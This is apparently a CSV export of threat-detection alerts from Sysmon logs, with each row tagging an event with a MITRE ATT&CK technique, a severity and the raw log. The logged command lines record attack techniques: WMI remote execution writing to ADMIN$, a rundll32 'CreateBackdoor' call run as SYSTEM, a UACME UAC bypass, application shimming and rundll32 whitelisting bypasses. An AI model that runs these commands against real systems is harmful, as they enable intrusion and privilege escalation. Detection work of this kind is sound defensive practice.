"c:\windows\system32\cmd.exe" /c net user ),1," 1 5 4 1 0 0x8000000000000000 1044 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-24 01:33:53.112 365ABB72-4A01-5CE7-0000-0010EE9DAC00 2404 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "c:\windows\system32\cmd.exe" /c net user c:\windows\system32\inetsrv\ IIS APPPOOL\DefaultAppPool 365ABB72-45C7-5CE7-0000-002092F99C00 0x9cf992 0 High SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-49D6-5CE7-0000-001020A7A700 2580 C:\Windows\System32\inetsrv\w3wp.exe c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v2.0" -l "webengine4.dll" -a \\.\pipe\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h "C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20 ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1584766825.513362,2020-03-21T09:00:25.513362+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," 1 5 4 1 0 0x8000000000000000 243562 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:25.488 747F3D96-9F69-5E75-0000-00105B9A2000 2028 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1556656371.324839,2019-05-01T00:32:51.324839+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1," 1 5 4 1 0 0x8000000000000000 9827 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-04-30 20:32:51.246 365ABB72-B0F3-5CC8-0000-0010B1361D00 2504 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 C:\ IEWIN7\IEUser 365ABB72-B0F2-5CC8-0000-00203D311D00 0x1d313d 0 High SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-B0C0-5CC8-0000-001017C31C00 836 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558661633.122501,2019-05-24T05:33:53.122501+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\cmd.exe ) through command line ( "c:\windows\system32\cmd.exe" /c net user ),1," 1 5 4 1 0 0x8000000000000000 1044 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-24 01:33:53.112 365ABB72-4A01-5CE7-0000-0010EE9DAC00 2404 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "c:\windows\system32\cmd.exe" /c net user c:\windows\system32\inetsrv\ IIS APPPOOL\DefaultAppPool 365ABB72-45C7-5CE7-0000-002092F99C00 0x9cf992 0 High SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-49D6-5CE7-0000-001020A7A700 2580 C:\Windows\System32\inetsrv\w3wp.exe c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v2.0" -l "webengine4.dll" -a \\.\pipe\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h "C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20 ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Process,1556656371.324839,2019-05-01T00:32:51.324839+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1," 1 5 4 1 0 0x8000000000000000 9827 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-04-30 20:32:51.246 365ABB72-B0F3-5CC8-0000-0010B1361D00 2504 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 C:\ IEWIN7\IEUser 365ABB72-B0F2-5CC8-0000-00203D311D00 0x1d313d 0 High SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-B0C0-5CC8-0000-001017C31C00 836 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1556656371.324839,2019-05-01T00:32:51.324839+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1," 1 5 4 1 0 0x8000000000000000 9827 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-04-30 20:32:51.246 365ABB72-B0F3-5CC8-0000-0010B1361D00 2504 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 C:\ IEWIN7\IEUser 365ABB72-B0F2-5CC8-0000-00203D311D00 0x1d313d 0 High SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-B0C0-5CC8-0000-001017C31C00 836 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564911238.127145,2019-08-04T13:33:58.127145+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\windows\system32\cmd.exe "C:\Windows\system32\osk.exe" ),1," 1 5 4 1 0 0x8000000000000000 5764 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-08-04 09:33:57.876 747F3D96-A685-5D46-0000-00100D41D703 3296 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation C:\windows\system32\cmd.exe "C:\Windows\system32\osk.exe" C:\Users\IEUser\Desktop\ MSEDGEWIN10\IEUser 747F3D96-56A3-5D45-0000-0020FBD31800 0x18d3fb 1 Medium SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-A685-5D46-0000-00109B2AD703 3916 C:\Users\IEUser\Desktop\UACME.exe UACME.exe 55 c:\Windows\SysWOW64\notepad.exe ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational Prohibited Process connecting to internet,1618950781.944467,2021-04-21T00:33:01.944467+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10 and IP ( 127.0.0.1 ) to hostname ( MSEDGEWIN10 ) , IP ( 127.0.0.1 ) and port ( 445 )",3," 3 5 4 3 0 0x8000000000000000 578500 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 Suspicious NetCon 2021-04-20 20:33:59.834 747F3D96-04C3-607F-0000-0010F13B1E00 2532 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MSEDGEWIN10\IEUser tcp true false 127.0.0.1 MSEDGEWIN10 49925 false 127.0.0.1 MSEDGEWIN10 445 microsoft-ds ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1556656371.246714,2019-05-01T00:32:51.246714+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1," 1 5 4 1 0 0x8000000000000000 9826 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-04-30 20:32:51.168 365ABB72-B0F3-5CC8-0000-00105F321D00 3840 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 C:\ IEWIN7\IEUser 365ABB72-B0F2-5CC8-0000-00203D311D00 0x1d313d 0 High SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-B0C0-5CC8-0000-001017C31C00 836 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Process,1556656371.246714,2019-05-01T00:32:51.246714+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1," 1 5 4 1 0 0x8000000000000000 9826 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-04-30 20:32:51.168 365ABB72-B0F3-5CC8-0000-00105F321D00 3840 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 C:\ IEWIN7\IEUser 365ABB72-B0F2-5CC8-0000-00203D311D00 0x1d313d 0 High SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-B0C0-5CC8-0000-001017C31C00 836 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1556656371.246714,2019-05-01T00:32:51.246714+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1," 1 5 4 1 0 0x8000000000000000 9826 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-04-30 20:32:51.168 365ABB72-B0F3-5CC8-0000-00105F321D00 3840 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 C:\ IEWIN7\IEUser 365ABB72-B0F2-5CC8-0000-00203D311D00 0x1d313d 0 High SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-B0C0-5CC8-0000-001017C31C00 836 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1138] Application Shimming - process,1553028584.802196,2019-03-20T00:49:44.802196+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1," 1 5 4 1 0 0x8000000000000000 1966408 Microsoft-Windows-Sysmon/Operational PC01.example.corp 2019-03-19 20:49:44.712 365ABB72-55E8-5C91-0000-001037DF0700 4052 C:\Windows\System32\sdbinst.exe 6.0.7600.16385 (win7_rtm.090713-1255) Application Compatibility Database Installer Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\sdbinst.exe" -q "C:\Windows\AppPatch\Test.SDB " C:\Windows\System32\ EXAMPLE\user01 365ABB72-5417-5C91-0000-002035340300 0x33435 1 High MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F 365ABB72-551C-5C91-0000-001030590500 2704 C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe" ",PC01.example.corp,Microsoft-Windows-Sysmon/Operational Command run remotely Using WMI,1607599134.733908,2020-12-10T15:18:54.733908+04:00,,Threat,Critical,User (NT AUTHORITY\LOCAL SERVICE) run command through WMI with process (C:\Windows\System32\wbem\WmiPrvSE.exe) and commandline ( C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ),1," 1 5 4 1 0 0x8000000000000000 549600 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-12-10 11:18:54.576 747F3D96-041E-5FD2-0000-001024DF3B00 5580 C:\Windows\System32\wbem\WmiPrvSE.exe 10.0.17763.1 (WinBuild.160101.0800) WMI Provider Host Microsoft® Windows® Operating System Microsoft Corporation Wmiprvse.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding C:\Windows\system32\ NT AUTHORITY\LOCAL SERVICE 747F3D96-7E79-5FD2-0000-0020E5030000 0x3e5 0 System SHA1=67C25C8F28B5FA7F5BAA85BF1D2726AED48E9CF0,MD5=06C66FF5CCDC2D22344A3EB761A4D38A,SHA256=B5C78BEF3883E3099F7EF844DA1446DB29107E5C0223B97F29E7FAFAB5527F15,IMPHASH=CFECEDC01015A4FD1BAACAC9E592D88B 00000000-0000-0000-0000-000000000000 832 ? ? ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1618950781.944115,2021-04-21T00:33:01.944115+04:00,,Threat,Low,Found User (MSEDGEWIN10\user03) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\System32\cmd.exe ),1," 1 5 4 1 0 0x8000000000000000 578499 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2021-04-20 20:33:00.318 747F3D96-3A7C-607F-0000-001058067700 2740 C:\Windows\System32\cmd.exe 10.0.17763.592 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe C:\Windows\System32\cmd.exe C:\Windows\system32\ MSEDGEWIN10\user03 747F3D96-3A7C-607F-0000-002075057700 0x770575 1 Medium SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-3A77-607F-0000-00105DD17600 7280 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1579034691.122589,2020-01-15T00:44:51.122589+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "cmd.exe" /c notepad.exe ),1," 1 5 4 1 0 0x8000000000000000 337 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-01-14 20:44:50.978 747F3D96-2842-5E1E-0000-0010745E7A00 1568 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe "cmd.exe" /c notepad.exe C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-2842-5E1E-0000-0020FF3A7A00 0x7a3aff 0 High SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-2842-5E1E-0000-00100C417A00 4180 C:\Windows\System32\rundll32.exe rundll32 url.dll,FileProtocolHandler ms-browser:// ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1556656513.168589,2019-05-01T00:35:13.168589+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 ),1," 1 5 4 1 0 0x8000000000000000 9833 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-04-30 20:35:12.340 365ABB72-B180-5CC8-0000-00102BB71E00 1504 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\cmd.exe" /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 C:\windows\system32\ IEWIN7\IEUser 365ABB72-B17F-5CC8-0000-0020C6A31E00 0x1ea3c6 0 High SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-B17F-5CC8-0000-001082A51E00 3572 C:\Windows\System32\mmc.exe C:\Windows\system32\mmc.exe -Embedding ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 url.dll,FileProtocolHandler ms-browser://)",1," 1 5 4 1 0 0x8000000000000000 336 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-01-14 20:44:50.348 747F3D96-2842-5E1E-0000-00100C417A00 4180 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 url.dll,FileProtocolHandler ms-browser:// C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-2842-5E1E-0000-0020FF3A7A00 0x7a3aff 0 High SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-2842-5E1E-0000-0010903C7A00 1628 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,FileProtocolHandler ms-browser:// )",1," 1 5 4 1 0 0x8000000000000000 336 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-01-14 20:44:50.348 747F3D96-2842-5E1E-0000-00100C417A00 4180 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 url.dll,FileProtocolHandler ms-browser:// C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-2842-5E1E-0000-0020FF3A7A00 0x7a3aff 0 High SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-2842-5E1E-0000-0010903C7A00 1628 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,FileProtocolHandler ms-browser:// )",1," 1 5 4 1 0 0x8000000000000000 336 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-01-14 20:44:50.348 747F3D96-2842-5E1E-0000-00100C417A00 4180 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 url.dll,FileProtocolHandler ms-browser:// C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-2842-5E1E-0000-0020FF3A7A00 0x7a3aff 0 High SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-2842-5E1E-0000-0010903C7A00 1628 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564436040.330766,2019-07-30T01:34:00.330766+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh trace stop ),1," 1 5 4 1 0 0x8000000000000000 4950 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:33:58.370 747F3D96-6646-5D3F-0000-0010913A8B00 6232 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd /c netsh trace stop C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-6609-5D3F-0000-00109FBF8500 1208 C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1584766825.46327,2020-03-21T09:00:25.463270+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," 1 5 4 1 0 0x8000000000000000 243558 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:25.452 747F3D96-9F69-5E75-0000-001035972000 1388 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Process,1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,FileProtocolHandler ms-browser:// )",1," 1 5 4 1 0 0x8000000000000000 336 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-01-14 20:44:50.348 747F3D96-2842-5E1E-0000-00100C417A00 4180 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 url.dll,FileProtocolHandler ms-browser:// C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-2842-5E1E-0000-0020FF3A7A00 0x7a3aff 0 High SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-2842-5E1E-0000-0010903C7A00 1628 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,FileProtocolHandler ms-browser:// )",1," 1 5 4 1 0 0x8000000000000000 336 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-01-14 20:44:50.348 747F3D96-2842-5E1E-0000-00100C417A00 4180 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 url.dll,FileProtocolHandler ms-browser:// C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-2842-5E1E-0000-0020FF3A7A00 0x7a3aff 0 High SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-2842-5E1E-0000-0010903C7A00 1628 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.46327,2020-03-21T09:00:25.463270+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," 1 5 